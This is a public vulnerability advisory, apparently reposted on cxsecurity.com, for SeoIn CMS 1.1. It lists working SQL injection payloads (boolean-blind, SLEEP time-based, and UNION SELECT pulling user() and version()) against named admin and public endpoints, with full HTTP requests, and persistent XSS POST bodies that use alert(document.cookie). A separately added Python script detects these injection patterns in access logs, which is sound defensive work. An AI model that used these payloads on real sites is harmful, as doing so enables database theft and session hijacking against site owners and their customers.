SeoIn CMS 1.1 - Multiple Vulnerabilities

2019.03.09
SajjadBnz (IR)
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

# Exploit Title: SeoIn CMS 1.1 - Multiple Vulnerabilities
# Date: 2019-01-14
# Exploit Author: SajjadBnz
# My Email: blackwolf@post.com
# Vendor Homepage: http://seoin.ir
# Version: 1.1
# Tested version: 1.1 - shopping website
# Vulnerability Types: Union-Based SQL Injection, AND boolean-based blind SQL Injection, AND/OR time-based blind SQL Injection, Persistent XSS, Directory/Path Traversal

[+] About :
===========

seoin.ir : We provide web sites and SEO services, or website optimization, in search engines like Google and Yahoo.

Our products:
  Customer Relationship Management Panel Version 1.1
  Online Store
  Industrial websites
  Support Center

http://seoin.ir/#about/8 : Institute of Information Technology, one of the first companies in the field of web marketing services and website design in the country, with more than 8 years of legal experience and 12 years of experience, ready to provide services to your loved ones.

[ Vulnerabilities ]

[+] 1. AND boolean-based blind
==============================

Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause

Payload: id=1 AND 5555=5555
Payload: id=10 AND 5555=5555
Payload: id=83 AND 5555=5555
Payload: id=24 AND 5555=5555

http://www.target.com/home/catpage.php?id=1[SQL]
http://www.target.com/admin/public/product_sub_group/edit.php?id=10[SQL] (in admin panel)
http://www.target.com/admin/public/comment/select_answer.php?id=83[SQL] (in admin panel)
http://www.target.com/admin/public/project/edit.php?id=24[SQL] (in admin panel)

[*] Header :

GET /home/catpage.php?id=1%20AND%205555=5555
GET /admin/public/product_sub_group/edit.php?id=10%20AND%205555=5555 (in admin panel)
GET /admin/public/comment/select_answer.php?id=83%20AND%205555=5555 (in admin panel)
GET /admin/public/project/edit.php?id=24 AND 5555=5555 (in admin panel)
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:64.0) Gecko/20100101 Firefox/64.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Cookie: PHPSESSID=eiqr4s0j1cgouqqo2nlt2ik1t6
Upgrade-Insecure-Requests: 1

[+] 2. AND/OR time-based blind
==============================

Parameter: id (GET)
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind

Payload: id=1 AND SLEEP(5)

http://www.target.com/home/catpage.php?id=1[SQL]

[*] Header :

GET /home/catpage.php?id=1%20AND%20SLEEP(5)
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:64.0) Gecko/20100101 Firefox/64.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Cookie: PHPSESSID=eiqr4s0j1cgouqqo2nlt2ik1t6
Upgrade-Insecure-Requests: 1

[+] 3. Union-Based (Basic) SQL Injection
========================================

You must be logged in as Admin (/admin/login.php).

Parameter: id (GET)
Type: Union-Based (Basic) SQL Injection

Payload: id=-13 UNION SELECT 1,2,version(),user(),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22-- -
Payload: id=-24 UNION SELECT 1,2,3,4,5,6,7,8,9,user(),11,version(),13,14,15,16,17,18,19,20,21,22,23,24,25,26,27-- -
Payload: id=-1 UNION SELECT 1,user(),version(),4,5,6,7,8,9,10,11-- -
Payload: id=-1 UNION SELECT 1,user(),3,4,5,6-- -
Payload: id=-3 UNION SELECT 1,user(),version(),4,5,6,7,8,9,10-- -
Payload: id=-21 UNION SELECT 1,version(),3,4,5,user(),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30--%20-

http://target.com/admin/public/product/edit.php?id=13[SQL]
http://target.com/admin/public/project/translate.php?id=24[SQL]
http://target.com/admin/public/news/edit.php?id=1[SQL]
http://target.com/admin/public/file/edit.php?id=1[SQL]
http://target.com/admin/public/education/edit.php?id=3[SQL]
http://target.com/admin/public/agency/edit.php?id=1[SQL]
http://target.com/admin/public/employment/edit.php?id=21[SQL]

[*] Header :

GET /admin/public/product/edit.php?id=-13%20UNION%20SELECT%201,2,version(),user(),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22--%20-
GET /admin/public/project/translate.php?id=-24 UNION SELECT 1,2,3,4,5,6,7,8,9,user(),11,version(),13,14,15,16,17,18,19,20,21,22,23,24,25,26,27-- -
GET /admin/public/news/edit.php?id=-1%20UNION%20SELECT%201,user(),version(),4,5,6,7,8,9,10,11-- -
GET /admin/public/file/edit.php?id=-1%20UNION%20SELECT%201,user(),3,4,5,6-- -
GET /admin/public/education/edit.php?id=-3%20UNION%20SELECT%201,user(),version(),4,5,6,7,8,9,10-- -
GET /admin/public/agency/edit.php?id=-1%20UNION%20SELECT%201,user(),version(),4,5,6,7,8,9,10-- -
GET /admin/public/employment/edit.php?id=-21%20UNION%20SELECT%201,version(),3,4,5,user(),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30--%20-
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:64.0) Gecko/20100101 Firefox/64.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Cookie: PHPSESSID=la3ijqba92l760moephnle58q3
Upgrade-Insecure-Requests: 1

[+] 4. Persistent XSS (Cross-site Scripting) - in Admin Panel
=============================================================

http://target.com/admin/public/news/add.php

[*] Header :

POST /admin/public/news/add.php
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:64.0) Gecko/20100101 Firefox/64.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://target.com/admin/public/news/add.php
Content-Type: multipart/form-data; boundary=---------------------------17937452617934146491585086724
Content-Length: 1022
Connection: keep-alive
Cookie: PHPSESSID=la3ijqba92l760moephnle58q3
Upgrade-Insecure-Requests: 1

POST data :

news_topic=<script>alert(document.cookie)</script>&news_text=<p>&lt;script&gt;alert(document.cookie)&lt;/script&gt;</p>&news_pic=&news_status=0&news_lang=1&news_reseller=1&news_sort=0

The JavaScript then runs on this page: http://target.com/admin/public/news/select.php (you can place JavaScript there).

Another persistent XSS :

POST /admin/public/file/server/add.php
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:64.0) Gecko/20100101 Firefox/64.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://target.com/admin/public/file/add.php
Content-Type: multipart/form-data; boundary=---------------------------27862807420897948352132776782
Content-Length: 500
Connection: keep-alive
Cookie: PHPSESSID=la3ijqba92l760moephnle58q3
Upgrade-Insecure-Requests: 1

POST data :

file_topic=<script>alert(document.cookie)</script>&file_file=&file_status=0

The JavaScript runs on this page: http://target.com/admin/public/file/select.php

Another persistent XSS :

POST /admin/public/link/server/add.php

POST data :

link_name=<script>alert(document.cookie)</script>&link_url=<script>alert(document.cookie)</script>&link_status=0&link_lang=1&link_reseller=1&link_sort=0

The JavaScript runs on this page: http://target.com/admin/public/link/select.php

*NOTE : All pages have this vulnerability.

[+] 5. Directory/Path Traversal :
================================

At http://target.com/admin/public/ you can find error_log and other PHP files such as edit, add & .... in all directories.

#EOF
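The three SQL injection shapes listed in sections 1 to 3 (boolean-based "AND n=n", time-based "AND SLEEP(n)", and "UNION SELECT" column probing against the id parameter) leave a recognisable trace in the web server's access log. The following detector is an added example written for this page and not part of the advisory or of SeoIn CMS; it assumes Common Log Format lines and uses constructed sample entries modelled on the request lines above.

```python
import re
from urllib.parse import urlsplit, unquote_plus

# Patterns for the three injection shapes the advisory reports against the id parameter.
SQLI_PATTERNS = {
    "boolean-based blind": re.compile(r"\b(AND|OR)\s+(\d+)\s*=\s*\2\b", re.I),
    "time-based blind": re.compile(r"\b(AND|OR)\s+SLEEP\s*\(\s*\d+\s*\)", re.I),
    "union-based": re.compile(r"\bUNION\s+(ALL\s+)?SELECT\b", re.I),
}

# Common Log Format: client - - [time] "METHOD target HTTP/x" status bytes
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

def classify_request(target):
    """Return (path, technique) when the query string matches a pattern, else None."""
    parts = urlsplit(target)
    decoded = unquote_plus(parts.query)  # normalise %20 / + so encoded and raw payloads match alike
    for name, pat in SQLI_PATTERNS.items():
        if pat.search(decoded):
            return parts.path, name
    return None

def scan_log(lines):
    """Parse access-log lines and return one dict per request that matches an injection pattern."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # skip lines that are not Common Log Format
        found = classify_request(m.group("target"))
        if found:
            path, technique = found
            hits.append({"ip": m.group("ip"), "path": path, "technique": technique,
                         "status": int(m.group("status"))})
    return hits

# Constructed sample log lines modelled on the advisory's request lines (not real traffic).
SAMPLE_LOG = """\
203.0.113.7 - - [14/Jan/2019:10:01:02 +0000] "GET /home/catpage.php?id=1 HTTP/1.1" 200 5120
203.0.113.7 - - [14/Jan/2019:10:01:09 +0000] "GET /home/catpage.php?id=1%20AND%205555=5555 HTTP/1.1" 200 5120
203.0.113.7 - - [14/Jan/2019:10:01:15 +0000] "GET /home/catpage.php?id=1%20AND%20SLEEP(5) HTTP/1.1" 200 5120
203.0.113.7 - - [14/Jan/2019:10:02:40 +0000] "GET /admin/public/news/edit.php?id=-1%20UNION%20SELECT%201,user(),version(),4,5,6,7,8,9,10,11--%20- HTTP/1.1" 200 7301
198.51.100.4 - - [14/Jan/2019:10:03:00 +0000] "GET /home/catpage.php?id=42 HTTP/1.1" 200 4980
"""

if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG.splitlines()):
        print(hit)
```

A 200 status on every matched request is itself a signal here: the page returns normally whether or not the injected condition holds, which is why the advisory classifies the first two cases as blind.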


Copyright 2019, cxsecurity.com